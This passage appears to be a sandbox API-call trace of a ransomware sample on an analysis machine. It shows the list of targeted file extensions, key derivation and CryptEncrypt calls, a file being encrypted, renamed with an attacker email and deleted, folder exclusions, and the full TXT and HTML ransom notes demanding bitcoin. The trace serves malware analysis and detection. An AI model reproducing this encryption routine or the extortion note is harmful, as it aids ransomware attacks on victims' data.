tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0190.731] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.731] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.731] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\y_fz9pz08c.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\y_fz9pz08c.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0190.735] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xd42f, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0xd42f, lpOverlapped=0x0) returned 1
	[0190.740] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.740] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb770) returned 1
	[0190.742] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.742] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0190.743] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.743] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0190.743] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.743] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0190.743] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.743] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0xd42f, dwBufLen=0xd42f | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0xd430) returned 1
	[0190.745] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.745] RtlMoveMemory (in: Destination=0xfea5b8, Source=0xfdd180, Length=0xd42f | out: Destination=0xfea5b8) 
	[0190.745] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.745] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfea5b8*, pdwDataLen=0x18bc0c*=0xd42f, dwBufLen=0xd430 | out: pbData=0xfea5b8*, pdwDataLen=0x18bc0c*=0xd430) returned 1
	[0190.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.747] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0190.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.748] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0190.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.748] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0190.748] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.748] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.749] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0190.750] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\y_fz9pz08c.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 84
	[0190.750] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\y_fz9pz08c.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\y_fz9pz08c.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0190.750] WriteFile (in: hFile=0x2c0, lpBuffer=0xfea5b8*, nNumberOfBytesToWrite=0xd430, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfea5b8*, lpNumberOfBytesWritten=0x18c068*=0xd430, lpOverlapped=0x0) returned 1
	[0190.756] CloseHandle (hObject=0x2c0) returned 1
	[0190.756] CloseHandle (hObject=0x384) returned 1
	[0190.757] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\y_fz9pz08c.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\y_fz9pz08c.m4a")) returned 1
	[0190.765] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\y_fz9pz08c.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\y_fz9pz08c.m4a")) returned 0
	[0190.765] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32459000, ftCreationTime.dwHighDateTime=0x1d96e7c, ftLastAccessTime.dwLowDateTime=0xbc6dc480, ftLastAccessTime.dwHighDateTime=0x1d9722f, ftLastWriteTime.dwLowDateTime=0xbc6dc480, ftLastWriteTime.dwHighDateTime=0x1d9722f, nFileSizeHigh=0x0, nFileSizeLow=0xd42f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y_fZ9PZ08C.m4a", cAlternateFileName="Y_FZ9P~1.M4A")) returned 0
	[0190.765] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0190.765] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0190.766] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music") returned="C:\\Users\\RDhJ0CNFevzX\\Music"
	[0190.766] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\*.*"
	[0190.766] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.766] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.766] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Music\\HELP_DECRYPT_YOUR_FILES.TXT") returned 55
	[0190.766] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0190.798] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0190.798] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0190.801] CloseHandle (hObject=0x380) returned 1
	[0190.801] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.802] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.802] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0190.803] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0190.803] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0190.804] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0190.804] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0190.804] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0190.804] CloseHandle (hObject=0x380) returned 1
	[0190.805] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.805] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.805] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0190.805] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Music\\HELP_DECRYPT_YOUR_FILES.HTML") returned 56
	[0190.805] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0190.808] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0190.808] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0190.811] CloseHandle (hObject=0x380) returned 1
	[0190.811] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.811] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.812] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.812] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0190.813] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0190.813] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0190.813] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0190.814] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0190.814] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0190.814] CloseHandle (hObject=0x380) returned 1
	[0190.814] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8b3b566a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b3b566a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0190.815] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\*.*") returned 31
	[0190.815] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.816] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\*.*", cchLength=0x1f | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\*.*") returned 0x1f
	[0190.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.816] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="windows") returned 0x0
	[0190.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.816] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="boot") returned 0x0
	[0190.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.816] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="system volume information") returned 0x0
	[0190.817] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.817] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0190.817] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.817] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="temp") returned 0x0
	[0190.817] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.817] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="program files") returned 0x0
	[0190.817] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.818] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="program files (x86)") returned 0x0
	[0190.818] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.818] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="appdata") returned 0x0
	[0190.818] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.818] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="application data") returned 0x0
	[0190.818] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.818] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="winnt") returned 0x0
	[0190.819] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.819] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="tmp") returned 0x0
	[0190.819] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.819] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="cache") returned 0x0
	[0190.819] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.819] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="temporary internet files") returned 0x0
	[0190.819] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.820] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="webcache") returned 0x0
	[0190.820] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.820] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="inetcache") returned 0x0
	[0190.820] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.820] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="nvidia") returned 0x0
	[0190.820] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.820] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="packages") returned 0x0
	[0190.820] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.821] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="cookies") returned 0x0
	[0190.821] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.821] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="programdata") returned 0x0
	[0190.821] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0190.821] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0190.821] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8b3b566a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8b3b566a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0190.821] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0190.822] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f4b4ef0, ftCreationTime.dwHighDateTime=0x1d97041, ftLastAccessTime.dwLowDateTime=0x9d63b90, ftLastAccessTime.dwHighDateTime=0x1d97626, ftLastWriteTime.dwLowDateTime=0x9d63b90, ftLastWriteTime.dwHighDateTime=0x1d97626, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="381iZ9BIYF", cAlternateFileName="381IZ9~1")) returned 1
	[0190.822] lstrcmpW (lpString1="381iZ9BIYF", lpString2="..") returned 1
	[0190.822] lstrcmpW (lpString1="381iZ9BIYF", lpString2=".") returned 1
	[0190.822] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music") returned="C:\\Users\\RDhJ0CNFevzX\\Music"
	[0190.822] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\"
	[0190.822] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\", lpString2="381iZ9BIYF" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF"
	[0190.822] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF"
	[0190.822] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\"
	[0190.822] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\"
	[0190.823] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\381iZ9BIYF\\*.*"
